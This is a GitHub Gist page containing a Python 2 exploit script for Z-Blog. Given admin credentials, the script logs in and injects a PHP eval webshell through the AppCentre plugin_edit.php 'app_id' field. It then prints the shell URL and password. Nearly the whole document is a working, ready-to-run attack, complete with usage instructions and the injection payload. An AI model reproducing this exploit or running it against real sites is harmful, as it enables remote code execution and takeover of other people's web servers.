Last active
December 14, 2017 03:18
-
-
Save WangYihang/318020687b7e5f1efb38e9afd40c941b to your computer and use it in GitHub Desktop.
ZBlog Background Getshell Exploit
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# encoding:utf-8 | |
# zblog-background-getshell-exploit | |
# Author : Shutdown_r & WangYihang | |
import requests | |
import hashlib | |
import sys | |
import string | |
prefix = "image" | |
webshell_password = "c" | |
filename = "update.php" | |
session = requests.Session() | |
def check_prefix(prefix): | |
allow_chars = string.letters + string.digits | |
if len(prefix) < 3: | |
print "[-] The length of 'prefix' must > 3" | |
return False | |
for i in prefix: | |
if i not in allow_chars: | |
print "[-] The prefix must be [a-zA-Z0-9]" | |
return False | |
return True | |
def md5(content): | |
return hashlib.md5(content).hexdigest() | |
def login(host, port, username, password): | |
url = "http://%s:%d/zb_system/cmd.php?act=verify" % (host, port) | |
data = { | |
"username": username, | |
"password": md5(password), | |
} | |
response = session.post(url, data=data) | |
content = response.content | |
return "后台首页" in content | |
def exploit(host, port): | |
url = "http://%s:%d/zb_users/plugin/AppCentre/plugin_edit.php" % ( | |
host, port) | |
data = { | |
"app_id": "%s'.eval($_REQUEST[%s]).'" % (prefix, webshell_password), | |
"app_path": filename, | |
} | |
response = session.post(url, data=data) | |
content = response.content | |
if "已存在同名的APP应用" in content: | |
print "[-] PlugIn name has been used! Please change the prefix!" | |
return False | |
elif len(content) == 0: | |
return True | |
else: | |
print "[-] Unknown error!" | |
return False | |
def main(): | |
if len(sys.argv) != 5: | |
print "Usage : " | |
print "\tpython %s [HOST] [PORT] [USERNAEM] [PASSWORD]" % (sys.argv[0]) | |
print "Examplt : " | |
print "\tpython exploit.py 127.0.0.1 80 admin admin" | |
print "Script Author : " | |
print "\tWangYihang<wangyihanger@gmail.com>" | |
print "vulnerability Author : " | |
print "\tShutdown-r" | |
exit(1) | |
host = sys.argv[1] | |
port = int(sys.argv[2]) | |
username = sys.argv[3] | |
password = sys.argv[4] | |
if not check_prefix(prefix): | |
exit(2) | |
webshell_url = "http://%s:%d/zb_users/plugin/%s'.eval($_REQUEST[%s]).'/%s" % (host, port, prefix, webshell_password, filename) | |
if not login(host, port, username, password): | |
print "[-] Login failed!" | |
print "[-] Please check your username and password" | |
exit(3) | |
print "[+] Login success!" | |
print "[+] Starting exploit..." | |
if exploit(host, port): | |
print "[+] Exploit success!" | |
print "[+] Enjoy your shell :" | |
print "[+] Url : %s" % (webshell_url) | |
print "[+] Pas : c" | |
print "[+] Remember to die() it!" | |
else: | |
print "[-] Exploit failed!" | |
if __name__ == "__main__": | |
main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment